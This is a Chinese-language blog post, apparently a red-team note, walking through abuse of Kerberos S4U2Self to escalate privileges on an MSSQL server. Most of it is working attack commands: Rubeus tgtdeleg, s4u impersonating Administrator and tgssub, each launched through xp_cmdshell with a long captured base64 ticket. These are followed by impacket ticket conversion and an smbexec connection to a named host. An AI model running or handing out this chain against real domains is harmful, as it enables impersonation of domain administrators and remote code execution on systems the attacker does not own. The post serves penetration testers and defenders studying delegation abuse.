滥用S4U2Self提权攻击链路
前言:滥用S4U2Self提权攻击链路
参考文章:https://www.cnblogs.com/websecyw/p/15437171.html
参考文章:https://www.cnblogs.com/zpchcbd/p/12963328.html
参考文章:https://blog.harmj0y.net/redteaming/rubeus-now-with-more-kekeo/
tgtdeleg
参考文章:https://www.cnblogs.com/websecyw/p/15437171.html
参考文章:https://blog.harmj0y.net/redteaming/rubeus-now-with-more-kekeo/
exec master..xp_cmdshell 'c:\programdata\rubeus.exe tgtdeleg /nowrap';
exec master..xp_cmdshell 'c:\programdata\Rubeus.exe s4u /self /nowrap /impersonateuser:Administrator /ticket:doIFMDCCBSygAwIBBaEDAgEWooIENjCCBDJhggQuMIIEKqADAgEFoQ0bC1pQQ0hDQkQuQ09NoiAwHqADAgECoRcwFRsGa3JidGd0GwtaUENIQ0JELkNPTaOCA/AwggPsoAMCARKhAwIBAqKCA94EggPapAyA2rjqbvbRU/AoT1AAdlMQEMlhiQ6Mw83b6noK3hE9fPVvR6MY87pt37DnMIhVyMSqMkUvughoNh1NDl5d3ZfzqqesMpSc7iOXpbliHlaP23g9SyekZ0xG6MCDpfGVMBba0TwuzGyy8KLbQNfFd744icFW9Y7jWVDtpyhx6DcY31yqafVyOE208GfKGry7x7IY1P83j7Eo7jzoVX0FuH+qjUix/3kRE2Oj8zJAIFqdKXYGCCQW+nIKigX6J7tR6er5PPmmsfcSGPqnp2HEPph2Lo/6KZD4Nm/sksxhLRJ4DBp1P75aADWiHIV7Cl6an5u+754PBeAejA2oVKSeofkMdU/wOzU47ZTjwmR6YKk83MMod3BlV9DXDh3mSx/Gc53co3TLb2BaFA1aW8xxRUO8KULxsXrkfFDeGjUroCGlqSL3WNZCmLHnBBt9GSU53rY82c11iGDH8XSsF8/3QaHXPtrHnxCMkpNWyoPWCiLD+BN78hQ8HCymqvvLfSHfmA+cc88g1eerinuwp5a7YmIjoAA6L4tWKvE7yni6qSlcudvL8J9xnBRYuvJIJLdLFrn4ddrQZtzSYVMjQIthPFkzvTRRiV1iikiWVyTW59hjWagaAMttcvpobIpB8LYOhfZBCcRKhz7ebERwT96BM3tlOMA8tNo31nd7D0Omu2joFU1hLEcfCzLHpYoHOTvMznbDb0g03wAaMe9U/PaUsYn76MoFND+5ACzyQXO4yeq2RvqAxQZil1pdN1YZvaD8lgwYuDZeL3zlsfJRnl0KARAeOXhXQW1d03v1m4g34CHzua2fOzSsvEIuzzAOLlhb9qqQ25ebIYB/9/EduGTnbL4Ra4jhvlv70178FVWnXWZz5Bj3yB7iQsp0Ldt0Kp91piWzTKkE/j2bws071BuOb5ZSzNOO3qMVoA8kzPVIJ48U8QTZ+hAFu2dqLRpyc7tfVo4lQEMt2hrlwPVrDA/LUQN1Sg8tO/edrToWwKgeMO4G1A/fY2nFKZDPGvN9yPmOH+arARxtD6/ePadrb7mza3YQzfnZc7j5UHXHIp+IOlgVqfb6HZ3GEEvGsGK9mm49Fwf8+lqhJjce3rnn54NgLSkG244Xd4PZ9erTy02AWNPQZGwa337uJ0cG/idZM81Fp5WS0UeAg39srb5o4pnWZLqr9aOcpxpo0OATo5MVQT7vh2bjqHBlt7pOkuZg/E3ZDiH8U1RRL/UesWIOiBAV4ROAnxuV1udx0yvK8ksW3XX1Dcl9fag4lob5aI3vc87wP51MeYTZSVNbJ9f5AYLzoAU29dvMucYRNmWjgeUwgeKgAwIBAKKB2gSB132B1DCB0aCBzjCByzCByKArMCmgAwIBEqEiBCAmBUH8pCQoQEcpStyXpBYrExCZAKhUXMTpwBihQTvpyaENGwtaUENIQ0JELkNPTaIXMBWgAwIBAaEOMAwbCldJTi1NU1NRTCSjBwMFAGChAAClERgPMjAyMzEyMjQwNzU0MjhaphEYDzIwMjMxMjI0MTc1NDI4WqcRGA8yMDIzMTIzMTA3NTQyOFqoDRsLWlBDSENCRC5DT02pIDAeoAMCAQKhFzAVGwZrcmJ0Z3QbC1pQQ0hDQkQuQ09N';
通过rubeus中的descibe来查看当前票据的信息,如下图所示
exec master..xp_cmdshell 'c:\programdata\rubeus.exe describe /ticket:doIFMDCCBSygAwIBBaEDAgEWooIENjCCBDJhggQuMIIEKqADAgEFoQ0bC1pQQ0hDQkQuQ09NoiAwHqADAgECoRcwFRsGa3JidGd0GwtaUENIQ0JELkNPTaOCA/AwggPsoAMCARKhAwIBAqKCA94EggPapAyA2rjqbvbRU/AoT1AAdlMQEMlhiQ6Mw83b6noK3hE9fPVvR6MY87pt37DnMIhVyMSqMkUvughoNh1NDl5d3ZfzqqesMpSc7iOXpbliHlaP23g9SyekZ0xG6MCDpfGVMBba0TwuzGyy8KLbQNfFd744icFW9Y7jWVDtpyhx6DcY31yqafVyOE208GfKGry7x7IY1P83j7Eo7jzoVX0FuH+qjUix/3kRE2Oj8zJAIFqdKXYGCCQW+nIKigX6J7tR6er5PPmmsfcSGPqnp2HEPph2Lo/6KZD4Nm/sksxhLRJ4DBp1P75aADWiHIV7Cl6an5u+754PBeAejA2oVKSeofkMdU/wOzU47ZTjwmR6YKk83MMod3BlV9DXDh3mSx/Gc53co3TLb2BaFA1aW8xxRUO8KULxsXrkfFDeGjUroCGlqSL3WNZCmLHnBBt9GSU53rY82c11iGDH8XSsF8/3QaHXPtrHnxCMkpNWyoPWCiLD+BN78hQ8HCymqvvLfSHfmA+cc88g1eerinuwp5a7YmIjoAA6L4tWKvE7yni6qSlcudvL8J9xnBRYuvJIJLdLFrn4ddrQZtzSYVMjQIthPFkzvTRRiV1iikiWVyTW59hjWagaAMttcvpobIpB8LYOhfZBCcRKhz7ebERwT96BM3tlOMA8tNo31nd7D0Omu2joFU1hLEcfCzLHpYoHOTvMznbDb0g03wAaMe9U/PaUsYn76MoFND+5ACzyQXO4yeq2RvqAxQZil1pdN1YZvaD8lgwYuDZeL3zlsfJRnl0KARAeOXhXQW1d03v1m4g34CHzua2fOzSsvEIuzzAOLlhb9qqQ25ebIYB/9/EduGTnbL4Ra4jhvlv70178FVWnXWZz5Bj3yB7iQsp0Ldt0Kp91piWzTKkE/j2bws071BuOb5ZSzNOO3qMVoA8kzPVIJ48U8QTZ+hAFu2dqLRpyc7tfVo4lQEMt2hrlwPVrDA/LUQN1Sg8tO/edrToWwKgeMO4G1A/fY2nFKZDPGvN9yPmOH+arARxtD6/ePadrb7mza3YQzfnZc7j5UHXHIp+IOlgVqfb6HZ3GEEvGsGK9mm49Fwf8+lqhJjce3rnn54NgLSkG244Xd4PZ9erTy02AWNPQZGwa337uJ0cG/idZM81Fp5WS0UeAg39srb5o4pnWZLqr9aOcpxpo0OATo5MVQT7vh2bjqHBlt7pOkuZg/E3ZDiH8U1RRL/UesWIOiBAV4ROAnxuV1udx0yvK8ksW3XX1Dcl9fag4lob5aI3vc87wP51MeYTZSVNbJ9f5AYLzoAU29dvMucYRNmWjgeUwgeKgAwIBAKKB2gSB132B1DCB0aCBzjCByzCByKArMCmgAwIBEqEiBCAmBUH8pCQoQEcpStyXpBYrExCZAKhUXMTpwBihQTvpyaENGwtaUENIQ0JELkNPTaIXMBWgAwIBAaEOMAwbCldJTi1NU1NRTCSjBwMFAGChAAClERgPMjAyMzEyMjQwNzU0MjhaphEYDzIwMjMxMjI0MTc1NDI4WqcRGA8yMDIzMTIzMTA3NTQyOFqoDRsLWlBDSENCRC5DT02pIDAeoAMCAQKhFzAVGwZrcmJ0Z3QbC1pQQ0hDQkQuQ09N';
知识点:SPN不是票据中受保护的一部分,当S4U2Proxy向KDC申请对应服务的TGS后,返回的TGS中的server name是加密的,service name是不加密的,所以当我们在内存中修改TGS的service name,我们就能获取同一主机上不同服务的访问权限。
可以简单地更改它Rubeus提供了一个命令tgssub来执行此操作
exec master..xp_cmdshell 'c:\programdata\Rubeus.exe tgssub /nowrap /altservice:cifs/WIN-MSSQL.zpchcbd.com /ticket:doIFMDCCBSygAwIBBaEDAgEWooIENjCCBDJhggQuMIIEKqADAgEFoQ0bC1pQQ0hDQkQuQ09NoiAwHqADAgECoRcwFRsGa3JidGd0GwtaUENIQ0JELkNPTaOCA/AwggPsoAMCARKhAwIBAqKCA94EggPapAyA2rjqbvbRU/AoT1AAdlMQEMlhiQ6Mw83b6noK3hE9fPVvR6MY87pt37DnMIhVyMSqMkUvughoNh1NDl5d3ZfzqqesMpSc7iOXpbliHlaP23g9SyekZ0xG6MCDpfGVMBba0TwuzGyy8KLbQNfFd744icFW9Y7jWVDtpyhx6DcY31yqafVyOE208GfKGry7x7IY1P83j7Eo7jzoVX0FuH+qjUix/3kRE2Oj8zJAIFqdKXYGCCQW+nIKigX6J7tR6er5PPmmsfcSGPqnp2HEPph2Lo/6KZD4Nm/sksxhLRJ4DBp1P75aADWiHIV7Cl6an5u+754PBeAejA2oVKSeofkMdU/wOzU47ZTjwmR6YKk83MMod3BlV9DXDh3mSx/Gc53co3TLb2BaFA1aW8xxRUO8KULxsXrkfFDeGjUroCGlqSL3WNZCmLHnBBt9GSU53rY82c11iGDH8XSsF8/3QaHXPtrHnxCMkpNWyoPWCiLD+BN78hQ8HCymqvvLfSHfmA+cc88g1eerinuwp5a7YmIjoAA6L4tWKvE7yni6qSlcudvL8J9xnBRYuvJIJLdLFrn4ddrQZtzSYVMjQIthPFkzvTRRiV1iikiWVyTW59hjWagaAMttcvpobIpB8LYOhfZBCcRKhz7ebERwT96BM3tlOMA8tNo31nd7D0Omu2joFU1hLEcfCzLHpYoHOTvMznbDb0g03wAaMe9U/PaUsYn76MoFND+5ACzyQXO4yeq2RvqAxQZil1pdN1YZvaD8lgwYuDZeL3zlsfJRnl0KARAeOXhXQW1d03v1m4g34CHzua2fOzSsvEIuzzAOLlhb9qqQ25ebIYB/9/EduGTnbL4Ra4jhvlv70178FVWnXWZz5Bj3yB7iQsp0Ldt0Kp91piWzTKkE/j2bws071BuOb5ZSzNOO3qMVoA8kzPVIJ48U8QTZ+hAFu2dqLRpyc7tfVo4lQEMt2hrlwPVrDA/LUQN1Sg8tO/edrToWwKgeMO4G1A/fY2nFKZDPGvN9yPmOH+arARxtD6/ePadrb7mza3YQzfnZc7j5UHXHIp+IOlgVqfb6HZ3GEEvGsGK9mm49Fwf8+lqhJjce3rnn54NgLSkG244Xd4PZ9erTy02AWNPQZGwa337uJ0cG/idZM81Fp5WS0UeAg39srb5o4pnWZLqr9aOcpxpo0OATo5MVQT7vh2bjqHBlt7pOkuZg/E3ZDiH8U1RRL/UesWIOiBAV4ROAnxuV1udx0yvK8ksW3XX1Dcl9fag4lob5aI3vc87wP51MeYTZSVNbJ9f5AYLzoAU29dvMucYRNmWjgeUwgeKgAwIBAKKB2gSB132B1DCB0aCBzjCByzCByKArMCmgAwIBEqEiBCAmBUH8pCQoQEcpStyXpBYrExCZAKhUXMTpwBihQTvpyaENGwtaUENIQ0JELkNPTaIXMBWgAwIBAaEOMAwbCldJTi1NU1NRTCSjBwMFAGChAAClERgPMjAyMzEyMjQwNzU0MjhaphEYDzIwMjMxMjI0MTc1NDI4WqcRGA8yMDIzMTIzMTA3NTQyOFqoDRsLWlBDSENCRC5DT02pIDAeoAMCAQKhFzAVGwZrcmJ0Z3QbC1pQQ0hDQkQuQ09N';
将获取到的Base64EncodedTicket进行base64解码
cat base64.kirbi | base64 -d > ticket.kirbi
使用impacket将它转换为linux下可用的票据
python3 ticketConverter.py ticket.kirbi ticket.ccache
将票据进行导入然后通过psexec来进行连接
export KRB5CCNAME=ticket.ccache python3 smbexec.py WIN-MSSQL.zpchcbd.com -no-pass -k -debug -dc-ip 192.168.75.202
注意点:如果不在域内的话记得先进行配置hosts文件,如下图所示
基于资源委派
参考文章:https://www.cnblogs.com/zpchcbd/p/12963328.html
基于资源委派的话就是跟正常资源委派利用方式一样,只是作用目标为自己了,可以参考上面的文章,该文章中已经进行记录。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
2019-12-24 学习:VB之p-code寻找操作数
2019-12-24 Domain Cached Credentials